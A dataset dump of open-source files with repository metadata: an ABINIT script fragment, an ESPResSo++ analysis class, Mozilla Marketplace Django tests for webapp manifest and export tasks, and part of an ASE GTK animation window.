print " Searching for inlined CPP macros in ABINIT src files "
print "-------------------------------------------------------"
else:
top = sys.argv[1]
exit_status = main(top)
sys.exit(exit_status)
|
SamKChang/abinit-7.10.5_multipole
|
special/scripts/check_inlined_macros.py
|
Python
|
gpl-3.0
| 2,974
|
[
"ABINIT"
] |
0a27e29ac767ebe251abbaa9a23f1294e5d8c40b7dc8b56f00ead122e7e48b63
|
# Copyright (C) 2012-2016
# Max Planck Institute for Polymer Research
# Copyright (C) 2008-2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
r"""
Computes and outputs to the screen the simulation progress (finished step) and
controls mass flux conservation when using MD-to-LB coupling. Ideally, the sum of mass
fluxes should be :math:`0`, i.e. :math:`j_{LB} + j_{MD} = 0`.
.. py:class:: espressopp.analysis.LBOutputScreen(system,lb)
:param std::shared_ptr system: system object defined earlier in the python-script
:param lb_object lb: lattice boltzmann object defined earlier in the python-script
Example:
>>> # initialise output to the screen
>>> outputScreen = espressopp.analysis.LBOutputScreen(system,lb)
>>>
>>> # initialise external analysis object with previously created output object
>>> # and periodicity of invocation (steps):
>>> extAnalysis = espressopp.integrator.ExtAnalyze(outputScreen,100)
>>>
>>> # add the external analysis object as an extension to the integrator
>>> integrator.addExtension( extAnalysis )
"""
from espressopp.esutil import cxxinit
from espressopp import pmi
from espressopp.analysis.LBOutput import *
from _espressopp import analysis_LBOutput_Screen
class LBOutputScreenLocal(LBOutputLocal, analysis_LBOutput_Screen):
def __init__(self, system, latticeboltzmann):
if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
cxxinit(self, analysis_LBOutput_Screen, system, latticeboltzmann)
if pmi.isController :
class LBOutputScreen(LBOutput, metaclass=pmi.Proxy):
pmiproxydefs = dict(
cls = 'espressopp.analysis.LBOutputScreenLocal',
pmicall = ["writeOutput", "getLBMom", "getMDMom"]
)
|
espressopp/espressopp
|
src/analysis/LBOutputScreen.py
|
Python
|
gpl-3.0
| 2,481
|
[
"ESPResSo"
] |
5f9835d6f2ccb6ffafe949dc6ee416c66f7d32459d72181d106a853674e6253e
|
# -*- coding: utf-8 -*-
import datetime
import hashlib
import json
import os
import stat
import tarfile
from copy import deepcopy
from tempfile import mkdtemp
from django.conf import settings
from django.core import mail
from django.core.files.storage import default_storage as storage
from django.core.management import call_command
from django.core.urlresolvers import reverse
import mock
from nose.tools import eq_, ok_
from requests.exceptions import RequestException
import mkt
import mkt.site.tests
from mkt.developers.models import ActivityLog
from mkt.files.models import File, FileUpload
from mkt.reviewers.models import RereviewQueue
from mkt.site.fixtures import fixture
from mkt.site.helpers import absolutify
from mkt.site.utils import app_factory
from mkt.users.models import UserProfile
from mkt.versions.models import Version
from mkt.webapps.models import AddonUser, Preview, Webapp
from mkt.webapps.tasks import (adjust_categories, dump_app, dump_user_installs,
export_data, fix_excluded_regions,
notify_developers_of_failure, pre_generate_apk,
PreGenAPKError, rm_directory, update_manifests,
zip_apps)
original = {
"version": "0.1",
"default_locale": "en-US",
"name": "MozillaBall",
"description": "Exciting Open Web development action!",
"icons": {
"32": "http://test.com/icon-32.png",
"48": "http://test.com/icon-48.png",
"128": "http://test.com/icon-128.png"
},
"installs_allowed_from": [
"*",
],
"locales": {
"de": {
"name": "Mozilla Kugel"
},
"fr": {
"description": "Testing name-less locale"
}
}
}
new = {
"version": "1.0",
"default_locale": "en-US",
"name": "MozillaBall",
"description": "Exciting Open Web development action!",
"icons": {
"32": "http://test.com/icon-32.png",
"48": "http://test.com/icon-48.png",
"128": "http://test.com/icon-128.png"
},
"installs_allowed_from": [
"*",
],
"locales": {
"de": {
"name": "Mozilla Kugel"
},
"fr": {
"description": "Testing name-less locale"
}
},
"developer": {
"name": "Mozilla",
"url": "http://www.mozilla.org/"
}
}
ohash = ('sha256:'
'fc11fba25f251d64343a7e8da4dfd812a57a121e61eb53c78c567536ab39b10d')
nhash = ('sha256:'
'409fbe87dca5a4a7937e3dea27b69cb3a3d68caf39151585aef0c7ab46d8ee1e')
class TestUpdateManifest(mkt.site.tests.TestCase):
fixtures = fixture('user_2519', 'user_999')
def setUp(self):
UserProfile.objects.get_or_create(id=settings.TASK_USER_ID)
# Not using app factory since it creates translations with an invalid
# locale of "en-us".
self.addon = Webapp.objects.create()
self.version = Version.objects.create(addon=self.addon,
_developer_name='Mozilla')
self.file = File.objects.create(
version=self.version, hash=ohash, status=mkt.STATUS_PUBLIC,
filename='%s-%s' % (self.addon.id, self.version.id))
self.addon.name = {
'en-US': 'MozillaBall',
'de': 'Mozilla Kugel',
}
self.addon.status = mkt.STATUS_PUBLIC
self.addon.manifest_url = 'http://nowhere.allizom.org/manifest.webapp'
self.addon.save()
self.addon.update_version()
self.addon.addonuser_set.create(user_id=999)
with storage.open(self.file.file_path, 'w') as fh:
fh.write(json.dumps(original))
# This is the hash to set the get_content_hash to, for showing
# that the webapp has been updated.
self._hash = nhash
# Let's use deepcopy so nested dicts are copied as new objects.
self.new = deepcopy(new)
self.content_type = 'application/x-web-app-manifest+json'
req_patcher = mock.patch('mkt.developers.tasks.requests.get')
self.req_mock = req_patcher.start()
self.addCleanup(req_patcher.stop)
self.response_mock = mock.Mock(status_code=200)
self.response_mock.iter_content.return_value = mock.Mock(
next=self._data)
self.response_mock.headers = {'content-type': self.content_type}
self.req_mock.return_value = self.response_mock
validator_patcher = mock.patch('mkt.webapps.tasks.validator')
self.validator = validator_patcher.start()
self.addCleanup(validator_patcher.stop)
self.validator.return_value = {}
@mock.patch('mkt.webapps.tasks._get_content_hash')
def _run(self, _get_content_hash, **kw):
# Will run the task and will act depending upon how you've set hash.
_get_content_hash.return_value = self._hash
update_manifests(ids=(self.addon.pk,), **kw)
def _data(self):
return json.dumps(self.new)
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
@mock.patch('mkt.webapps.models.copy_stored_file')
def test_new_version_not_created(self, _copy_stored_file, _manifest_json):
# Test that update_manifest doesn't create multiple versions/files.
eq_(self.addon.versions.count(), 1)
old_version = self.addon.current_version
old_file = self.addon.get_latest_file()
self._run()
app = self.addon.reload()
version = app.current_version
file_ = app.get_latest_file()
# Test that our new version looks good.
eq_(app.versions.count(), 1)
eq_(version, old_version, 'Version created')
eq_(file_, old_file, 'File created')
path = FileUpload.objects.all()[0].path
_copy_stored_file.assert_called_with(path,
os.path.join(version.path_prefix,
file_.filename))
_manifest_json.assert_called_with(file_)
@mock.patch('mkt.developers.tasks.validator', lambda uid, **kw: None)
def test_version_updated(self):
self._run()
self.new['version'] = '1.1'
self._hash = 'foo'
self._run()
app = self.addon.reload()
eq_(app.versions.latest().version, '1.1')
def test_not_log(self):
self._hash = ohash
self._run()
eq_(ActivityLog.objects.for_apps([self.addon]).count(), 0)
def test_log(self):
self._run()
eq_(ActivityLog.objects.for_apps([self.addon]).count(), 1)
@mock.patch('mkt.webapps.tasks._update_manifest')
def test_pending(self, mock_):
self.addon.update(status=mkt.STATUS_PENDING)
call_command('process_addons', task='update_manifests')
assert mock_.called
def test_pending_updates(self):
"""
PENDING apps don't have a current version. This test makes sure
everything still works in this case.
"""
self.addon.update(status=mkt.STATUS_PENDING)
self._run()
eq_(self.addon.latest_version.reload().version, '1.0')
@mock.patch('mkt.webapps.tasks._update_manifest')
def test_approved(self, mock_):
self.addon.update(status=mkt.STATUS_APPROVED)
call_command('process_addons', task='update_manifests')
assert mock_.called
@mock.patch('mkt.webapps.tasks._update_manifest')
def test_ignore_disabled(self, mock_):
self.addon.update(status=mkt.STATUS_DISABLED)
call_command('process_addons', task='update_manifests')
assert not mock_.called
@mock.patch('mkt.webapps.tasks._update_manifest')
def test_ignore_packaged(self, mock_):
self.addon.update(is_packaged=True)
call_command('process_addons', task='update_manifests')
assert not mock_.called
@mock.patch('mkt.webapps.tasks._update_manifest')
def test_get_webapp(self, mock_):
eq_(self.addon.status, mkt.STATUS_PUBLIC)
call_command('process_addons', task='update_manifests')
assert mock_.called
@mock.patch('mkt.webapps.tasks._fetch_manifest')
@mock.patch('mkt.webapps.tasks.update_manifests.retry')
def test_update_manifest(self, retry, fetch):
fetch.return_value = '{}'
update_manifests(ids=(self.addon.pk,))
assert not retry.called
@mock.patch('mkt.webapps.tasks._fetch_manifest')
@mock.patch('mkt.webapps.tasks.update_manifests.retry')
def test_manifest_fetch_fail(self, retry, fetch):
later = datetime.datetime.now() + datetime.timedelta(seconds=3600)
fetch.side_effect = RuntimeError
update_manifests(ids=(self.addon.pk,))
retry.assert_called()
# Not using assert_called_with b/c eta is a datetime.
eq_(retry.call_args[1]['args'], ([self.addon.pk],))
eq_(retry.call_args[1]['kwargs'], {'check_hash': True,
'retries': {self.addon.pk: 1}})
self.assertCloseToNow(retry.call_args[1]['eta'], later)
eq_(retry.call_args[1]['max_retries'], 5)
eq_(len(mail.outbox), 0)
def test_notify_failure_lang(self):
user1 = UserProfile.objects.get(pk=999)
user2 = UserProfile.objects.get(pk=2519)
AddonUser.objects.create(addon=self.addon, user=user2)
user1.update(lang='de')
user2.update(lang='en')
notify_developers_of_failure(self.addon, 'blah')
eq_(len(mail.outbox), 2)
ok_(u'Mozilla Kugel' in mail.outbox[0].subject)
ok_(u'MozillaBall' in mail.outbox[1].subject)
def test_notify_failure_with_rereview(self):
RereviewQueue.flag(self.addon, mkt.LOG.REREVIEW_MANIFEST_CHANGE,
'This app is flagged!')
notify_developers_of_failure(self.addon, 'blah')
eq_(len(mail.outbox), 0)
def test_notify_failure_not_public(self):
self.addon.update(status=mkt.STATUS_PENDING)
notify_developers_of_failure(self.addon, 'blah')
eq_(len(mail.outbox), 0)
@mock.patch('mkt.webapps.tasks._fetch_manifest')
@mock.patch('mkt.webapps.tasks.update_manifests.retry')
def test_manifest_fetch_3rd_attempt(self, retry, fetch):
fetch.side_effect = RuntimeError
update_manifests(ids=(self.addon.pk,), retries={self.addon.pk: 2})
# We already tried twice before, this is the 3rd attempt,
# We should notify the developer that something is wrong.
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
ok_(msg.subject.startswith('Issue with your app'))
expected = u'Failed to get manifest from %s' % self.addon.manifest_url
ok_(expected in msg.body)
ok_(settings.SUPPORT_GROUP in msg.body)
# We should have scheduled a retry.
assert retry.called
# We shouldn't have put the app in the rereview queue yet.
assert not RereviewQueue.objects.filter(addon=self.addon).exists()
@mock.patch('mkt.webapps.tasks._fetch_manifest')
@mock.patch('mkt.webapps.tasks.update_manifests.retry')
@mock.patch('mkt.webapps.tasks.notify_developers_of_failure')
def test_manifest_fetch_4th_attempt(self, notify, retry, fetch):
fetch.side_effect = RuntimeError
update_manifests(ids=(self.addon.pk,), retries={self.addon.pk: 3})
# We already tried 3 times before, this is the 4th and last attempt,
# we shouldn't retry anymore, instead we should just add the app to
# the re-review queue. We shouldn't notify the developer either at this
# step, it should have been done before already.
assert not notify.called
assert not retry.called
assert RereviewQueue.objects.filter(addon=self.addon).exists()
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
def test_manifest_validation_failure(self, _iarc):
# We are already mocking validator, but this test needs to make sure
# it actually saves our custom validation result, so add that.
def side_effect(upload_id, **kwargs):
upload = FileUpload.objects.get(pk=upload_id)
upload.validation = json.dumps(validation_results)
upload.save()
validation_results = {
'errors': 1,
'messages': [{
'context': None,
'uid': 'whatever',
'column': None,
'id': ['webapp', 'detect_webapp', 'parse_error'],
'file': '',
'tier': 1,
'message': 'JSON Parse Error',
'type': 'error',
'line': None,
'description': 'The webapp extension could not be parsed due '
'to a syntax error in the JSON.'
}]
}
self.validator.side_effect = side_effect
eq_(RereviewQueue.objects.count(), 0)
self._run()
eq_(RereviewQueue.objects.count(), 1)
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
upload = FileUpload.objects.get()
validation_url = absolutify(reverse(
'mkt.developers.upload_detail', args=[upload.uuid]))
ok_(msg.subject.startswith('Issue with your app'))
ok_(validation_results['messages'][0]['message'] in msg.body)
ok_(validation_url in msg.body)
ok_(not _iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_name_change_rereview(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
self.new['name'] = 'Mozilla Ball Ultimate Edition'
eq_(RereviewQueue.objects.count(), 0)
self._run()
eq_(RereviewQueue.objects.count(), 1)
# 2 logs: 1 for manifest update, 1 for re-review trigger.
eq_(ActivityLog.objects.for_apps([self.addon]).count(), 2)
ok_(_iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_locale_name_add_rereview(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
self.new['locales'] = {'es': {'name': 'eso'}}
eq_(RereviewQueue.objects.count(), 0)
self._run()
eq_(RereviewQueue.objects.count(), 1)
# 2 logs: 1 for manifest update, 1 for re-review trigger.
eq_(ActivityLog.objects.for_apps([self.addon]).count(), 2)
log = ActivityLog.objects.filter(
action=mkt.LOG.REREVIEW_MANIFEST_CHANGE.id)[0]
eq_(log.details.get('comments'),
u'Locales added: "eso" (es).')
ok_(not _iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_locale_name_change_rereview(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
self.new['locales'] = {'de': {'name': 'Bippity Bop'}}
eq_(RereviewQueue.objects.count(), 0)
self._run()
eq_(RereviewQueue.objects.count(), 1)
# 2 logs: 1 for manifest update, 1 for re-review trigger.
eq_(ActivityLog.objects.for_apps([self.addon]).count(), 2)
log = ActivityLog.objects.filter(
action=mkt.LOG.REREVIEW_MANIFEST_CHANGE.id)[0]
eq_(log.details.get('comments'),
u'Locales updated: "Mozilla Kugel" -> "Bippity Bop" (de).')
ok_(not _iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_default_locale_change(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
self.new['name'] = u'Mozilla Balón'
self.new['default_locale'] = 'es'
self.new['locales'] = {'en-US': {'name': 'MozillaBall'}}
eq_(RereviewQueue.objects.count(), 0)
self._run()
eq_(RereviewQueue.objects.count(), 1)
eq_(self.addon.reload().default_locale, 'es')
# 2 logs: 1 for manifest update, 1 for re-review trigger.
eq_(ActivityLog.objects.for_apps([self.addon]).count(), 2)
log = ActivityLog.objects.filter(
action=mkt.LOG.REREVIEW_MANIFEST_CHANGE.id)[0]
eq_(log.details.get('comments'),
u'Manifest name changed from "MozillaBall" to "Mozilla Balón". '
u'Default locale changed from "en-US" to "es". '
u'Locales added: "Mozilla Balón" (es).')
ok_(_iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_locale_name_removal_no_rereview(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
# Note: Not using `del` b/c copy doesn't copy nested structures.
self.new['locales'] = {
'fr': {'description': 'Testing name-less locale'}
}
eq_(RereviewQueue.objects.count(), 0)
self._run()
eq_(RereviewQueue.objects.count(), 0)
# Log for manifest update.
eq_(ActivityLog.objects.for_apps([self.addon]).count(), 1)
ok_(not _iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_force_rereview(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
self.new['name'] = 'Mozilla Ball Ultimate Edition'
# We're setting the hash to the same value.
self.file.update(hash=nhash)
eq_(RereviewQueue.objects.count(), 0)
self._run(check_hash=False)
# We should still get a rereview since we bypassed the manifest check.
eq_(RereviewQueue.objects.count(), 1)
# 2 logs: 1 for manifest update, 1 for re-review trigger.
eq_(ActivityLog.objects.for_apps([self.addon]).count(), 2)
ok_(_iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_support_locales_change(self, _manifest, _iarc):
"""
Test both PUBLIC and PENDING to catch apps w/o `current_version`.
"""
for status in (mkt.STATUS_PUBLIC, mkt.STATUS_PENDING):
self.addon.update(status=status)
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
self.new['locales'].update({'es': {'name': u'Mozilla Balón'}})
self._run()
ver = self.version.reload()
eq_(ver.supported_locales, 'de,es,fr')
ok_(not _iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_support_developer_change(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with developer name change.
self.new['developer']['name'] = 'Allizom'
self._run()
ver = self.version.reload()
eq_(ver.developer_name, 'Allizom')
# We should get a re-review because of the developer name change.
eq_(RereviewQueue.objects.count(), 1)
# 2 logs: 1 for manifest update, 1 for re-review trigger.
eq_(ActivityLog.objects.for_apps([self.addon]).count(), 2)
ok_(_iarc.called)
class TestDumpApps(mkt.site.tests.TestCase):
fixtures = fixture('webapp_337141')
def test_dump_app(self):
fn = dump_app(337141)
result = json.load(open(fn, 'r'))
eq_(result['id'], 337141)
def test_zip_apps(self):
dump_app(337141)
fn = zip_apps()
for f in ['license.txt', 'readme.txt']:
ok_(os.path.exists(os.path.join(settings.DUMPED_APPS_PATH, f)))
ok_(os.stat(fn)[stat.ST_SIZE])
latest_tgz = os.path.join(os.path.dirname(fn), 'latest.tgz')
ok_(os.readlink(latest_tgz) == os.path.basename(fn))
@mock.patch('mkt.webapps.tasks.dump_app')
def test_not_public(self, dump_app):
app = Webapp.objects.get(pk=337141)
app.update(status=mkt.STATUS_PENDING)
call_command('process_addons', task='dump_apps')
assert not dump_app.called
def test_removed(self):
# At least one public app must exist for dump_apps to run.
app_factory(name='second app', status=mkt.STATUS_PUBLIC)
app_path = os.path.join(settings.DUMPED_APPS_PATH, 'apps', '337',
'337141.json')
app = Webapp.objects.get(pk=337141)
app.update(status=mkt.STATUS_PUBLIC)
call_command('process_addons', task='dump_apps')
assert os.path.exists(app_path)
app.update(status=mkt.STATUS_PENDING)
call_command('process_addons', task='dump_apps')
assert not os.path.exists(app_path)
@mock.patch('mkt.webapps.tasks.dump_app')
def test_public(self, dump_app):
call_command('process_addons', task='dump_apps')
assert dump_app.called
class TestDumpUserInstalls(mkt.site.tests.TestCase):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
super(TestDumpUserInstalls, self).setUp()
# Create a user install.
self.app = Webapp.objects.get(pk=337141)
self.user = UserProfile.objects.get(pk=2519)
self.app.installed.create(user=self.user)
self.hash = hashlib.sha256('%s%s' % (str(self.user.pk),
settings.SECRET_KEY)).hexdigest()
self.path = os.path.join(settings.DUMPED_USERS_PATH, 'users',
self.hash[0], '%s.json' % self.hash)
def tearDown(self):
try:
os.unlink(self.path)
except OSError:
pass
super(TestDumpUserInstalls, self).tearDown()
def dump_and_load(self):
dump_user_installs([self.user.pk])
return json.load(open(self.path, 'r'))
def test_dump_user_installs(self):
data = self.dump_and_load()
eq_(data['user'], self.hash)
eq_(data['region'], self.user.region)
eq_(data['lang'], self.user.lang)
installed = data['installed_apps'][0]
eq_(installed['id'], self.app.id)
eq_(installed['slug'], self.app.app_slug)
self.assertCloseToNow(
datetime.datetime.strptime(installed['installed'],
'%Y-%m-%dT%H:%M:%S'),
datetime.datetime.utcnow())
def test_dump_exludes_deleted(self):
"""We can't recommend deleted apps, so don't include them."""
app = app_factory()
app.installed.create(user=self.user)
app.delete()
data = self.dump_and_load()
eq_(len(data['installed_apps']), 1)
installed = data['installed_apps'][0]
eq_(installed['id'], self.app.id)
def test_dump_recommendation_opt_out(self):
self.user.update(enable_recommendations=False)
with self.assertRaises(IOError):
# File shouldn't exist b/c we didn't write it.
self.dump_and_load()
class TestFixMissingIcons(mkt.site.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.app = Webapp.objects.get(pk=337141)
@mock.patch('mkt.webapps.tasks._fix_missing_icons')
def test_pending(self, mock_):
self.app.update(status=mkt.STATUS_PENDING)
call_command('process_addons', task='fix_missing_icons')
assert mock_.called
@mock.patch('mkt.webapps.tasks._fix_missing_icons')
def test_approved(self, mock_):
self.app.update(status=mkt.STATUS_APPROVED)
call_command('process_addons', task='fix_missing_icons')
assert mock_.called
@mock.patch('mkt.webapps.tasks._fix_missing_icons')
def test_ignore_disabled(self, mock_):
self.app.update(status=mkt.STATUS_DISABLED)
call_command('process_addons', task='fix_missing_icons')
assert not mock_.called
@mock.patch('mkt.webapps.tasks.fetch_icon')
@mock.patch('mkt.webapps.tasks._log')
@mock.patch('mkt.webapps.tasks.storage.exists')
def test_for_missing_size(self, exists, _log, fetch_icon):
exists.return_value = False
call_command('process_addons', task='fix_missing_icons')
# We are checking two sizes, but since the 64 has already failed for
# this app, we should only have called exists() once, and we should
# never have logged that the 128 icon is missing.
eq_(exists.call_count, 1)
assert _log.any_call(337141, 'Webapp is missing icon size 64')
assert _log.any_call(337141, 'Webapp is missing icon size 128')
assert fetch_icon.called
class TestRegenerateIconsAndThumbnails(mkt.site.tests.TestCase):
fixtures = fixture('webapp_337141')
@mock.patch('mkt.webapps.tasks.resize_preview.delay')
def test_command(self, resize_preview):
preview = Preview.objects.create(filetype='image/png', addon_id=337141)
call_command('process_addons', task='regenerate_icons_and_thumbnails')
resize_preview.assert_called_once_with(preview.image_path, preview,
generate_image=False)
@mock.patch('mkt.webapps.tasks.requests')
class TestPreGenAPKs(mkt.site.tests.WebappTestCase):
def setUp(self):
super(TestPreGenAPKs, self).setUp()
self.manifest_url = u'http://some-âpp.net/manifest.webapp'
self.app.update(manifest_url=self.manifest_url)
def test_get(self, req):
res = mock.Mock()
req.get.return_value = res
pre_generate_apk.delay(self.app.id)
assert req.get.called, 'APK requested from factory'
assert req.get.mock_calls[0].startswith(
settings.PRE_GENERATE_APK_URL), req.get.mock_calls
assert res.raise_for_status.called, 'raise on bad status codes'
def test_get_packaged(self, req):
self.app.update(manifest_url=None, is_packaged=True)
# Make sure this doesn't raise an exception.
pre_generate_apk.delay(self.app.id)
assert req.get.called, 'APK requested from factory'
def test_no_manifest(self, req):
self.app.update(manifest_url=None)
with self.assertRaises(PreGenAPKError):
pre_generate_apk.delay(self.app.id)
def test_error_getting(self, req):
req.get.side_effect = RequestException
with self.assertRaises(PreGenAPKError):
pre_generate_apk.delay(self.app.id)
class TestExportData(mkt.site.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.export_directory = mkdtemp()
self.app_path = 'apps/337/337141.json'
def tearDown(self):
rm_directory(self.export_directory)
def create_export(self, name):
with self.settings(DUMPED_APPS_PATH=self.export_directory):
export_data(name=name)
tarball_path = os.path.join(self.export_directory,
'tarballs',
name + '.tgz')
return tarfile.open(tarball_path)
def test_export_is_created(self):
expected_files = [
self.app_path,
'license.txt',
'readme.txt',
]
tarball = self.create_export('tarball-name')
actual_files = tarball.getnames()
for expected_file in expected_files:
assert expected_file in actual_files, expected_file
class TestFixExcludedRegions(mkt.site.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.app = Webapp.objects.get(pk=337141)
@mock.patch('mkt.webapps.tasks.index_webapps')
def test_ignore_restricted(self, _mock):
"""Set up exclusions and verify they still exist after the call."""
self.app.geodata.update(restricted=True)
self.app.addonexcludedregion.create(region=mkt.regions.PER.id)
self.app.addonexcludedregion.create(region=mkt.regions.FRA.id)
fix_excluded_regions([self.app.pk])
self.assertSetEqual(self.app.get_excluded_region_ids(),
[mkt.regions.PER.id, mkt.regions.FRA.id])
eq_(self.app.addonexcludedregion.count(), 2)
@mock.patch('mkt.webapps.tasks.index_webapps')
def test_free_iarc_excluded(self, _mock):
# Set a few exclusions that shouldn't survive.
self.app.addonexcludedregion.create(region=mkt.regions.PER.id)
self.app.addonexcludedregion.create(region=mkt.regions.FRA.id)
# Set IARC settings to influence region exclusions.
self.app.geodata.update(region_de_iarc_exclude=True,
region_br_iarc_exclude=True)
fix_excluded_regions([self.app.pk])
self.assertSetEqual(self.app.get_excluded_region_ids(),
[mkt.regions.DEU.id, mkt.regions.BRA.id])
eq_(self.app.addonexcludedregion.count(), 0)
@mock.patch('mkt.webapps.tasks.index_webapps')
def test_paid(self, _mock):
self.make_premium(self.app)
fix_excluded_regions([self.app.pk])
# There are no exclusions at all, because the payments fall back
# to rest of the world.
self.assertSetEqual(self.app.get_excluded_region_ids(), [])
eq_(self.app.addonexcludedregion.count(), 0)
@mock.patch('mkt.webapps.tasks.index_webapps')
def test_paid_and_worldwide(self, _mock):
self.make_premium(self.app)
fix_excluded_regions([self.app.pk])
self.app.addonexcludedregion.create(region=mkt.regions.RESTOFWORLD.id)
# All the other countries are excluded, but not the US because they
# choose to exclude the rest of the world.
excluded = set(mkt.regions.ALL_REGION_IDS) - set([mkt.regions.USA.id])
self.assertSetEqual(self.app.get_excluded_region_ids(), excluded)
eq_(self.app.addonexcludedregion.count(), 1)
@mock.patch('mkt.webapps.tasks.index_webapps')
def test_free_special_excluded(self, _mock):
for region in mkt.regions.SPECIAL_REGION_IDS:
self.app.addonexcludedregion.create(region=region)
fix_excluded_regions([self.app.pk])
self.assertSetEqual(self.app.get_excluded_region_ids(),
mkt.regions.SPECIAL_REGION_IDS)
eq_(self.app.addonexcludedregion.count(),
len(mkt.regions.SPECIAL_REGION_IDS))
class TestAdjustCategories(mkt.site.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.app = Webapp.objects.get(pk=337141)
def test_adjust_single_category(self):
self.app.categories = ['news-weather']
self.app.save()
adjust_categories([self.app.pk])
eq_(self.app.reload().categories, ['news'])
def test_adjust_double_category(self):
self.app.categories = ['news-weather', 'social']
self.app.save()
adjust_categories([self.app.pk])
self.assertSetEqual(self.app.reload().categories, ['news', 'social'])
def test_new_category(self):
app_id = 424184
# `complete=True` adds the 'utilities' category.
app = app_factory(id=app_id, name='second', status=mkt.STATUS_PUBLIC,
complete=True)
adjust_categories([app_id])
self.assertSetEqual(app.reload().categories,
['food-drink', 'health-fitness'])
|
mstriemer/zamboni
|
mkt/webapps/tests/test_tasks.py
|
Python
|
bsd-3-clause
| 32,207
|
[
"exciting"
] |
6dfa112b17444bc1fb4dd53fa82eaa6b65af8cab8a41177c042a105fca05e28e
|
#!/usr/bin/env python
import gtk
import gobject
from ase.gui.languages import translate as _
from ase.gui.widgets import pack
class Movie(gtk.Window):
def __init__(self, gui):
gtk.Window.__init__(self)
self.set_position(gtk.WIN_POS_NONE)
self.connect('destroy', self.close)
#self.connect('delete_event', self.exit2)
self.set_title('Movie')
vbox = gtk.VBox()
pack(vbox, gtk.Label(_('Image number:')))
self.frame_number = gtk.Adjustment(gui.frame, 0,
gui.images.nimages - 1,
1.0, 5.0)
self.frame_number.connect('value-changed', self.new_frame)
hscale = pack(vbox, gtk.HScale(self.frame_number))
hscale.set_update_policy(gtk.UPDATE_DISCONTINUOUS)
hscale.set_digits(0)
buttons = [gtk.Button(stock=gtk.STOCK_GOTO_FIRST),
gtk.Button(stock=gtk.STOCK_GO_BACK),
gtk.Button(stock=gtk.STOCK_GO_FORWARD),
gtk.Button(stock=gtk.STOCK_GOTO_LAST)]
for button in buttons:
hboxb = button.child.child
label = hboxb.get_children()[1]
hboxb.remove(label)
buttons[0].connect('clicked', self.click, -10000000)
buttons[1].connect('clicked', self.click, -1)
buttons[2].connect('clicked', self.click, 1)
buttons[3].connect('clicked', self.click, 10000000)
pack(vbox, buttons)
play, stop = pack(vbox, [gtk.Button(_('Play')),
gtk.Button('Stop')])
play.connect('clicked', self.play)
stop.connect('clicked', self.stop)
self.rock = pack(vbox, gtk.CheckButton('Rock'))
self.time = gtk.Adjustment(2.0, 0.5, 9.0, 0.2)
hscale = pack(vbox, gtk.HScale(self.time))
hscale.set_update_policy(gtk.UPDATE_DISCONTINUOUS)
self.time.connect('value-changed', self.new_time)
self.add(vbox)
self.set_tip = gtk.Tooltips().set_tip
self.set_tip(hscale, _('Adjust play time.'))
vbox.show()
self.show()
self.gui = gui
#gui.m=self
self.direction = 1
self.id = None
def close(self, event):
self.stop()
def click(self, button, step):
i = max(0, min(self.gui.images.nimages - 1, self.gui.frame + step))
self.gui.set_frame(i)
self.frame_number.value = i
self.direction = cmp(step, 0)
def new_frame(self, widget):
self.gui.set_frame(int(self.frame_number.value))
def play(self, widget=None):
if self.id is not None:
gobject.source_remove(self.id)
t = int(1000 * self.time.value / (self.gui.images.nimages - 1))
self.id = gobject.timeout_add(t, self.step)
def stop(self, widget=None):
if self.id is not None:
gobject.source_remove(self.id)
self.id = None
def step(self):
i = self.gui.frame
nimages = self.gui.images.nimages
if self.rock.get_active():
if i == 0:
self.direction = 1
elif i == nimages - 1:
self.direction = -1
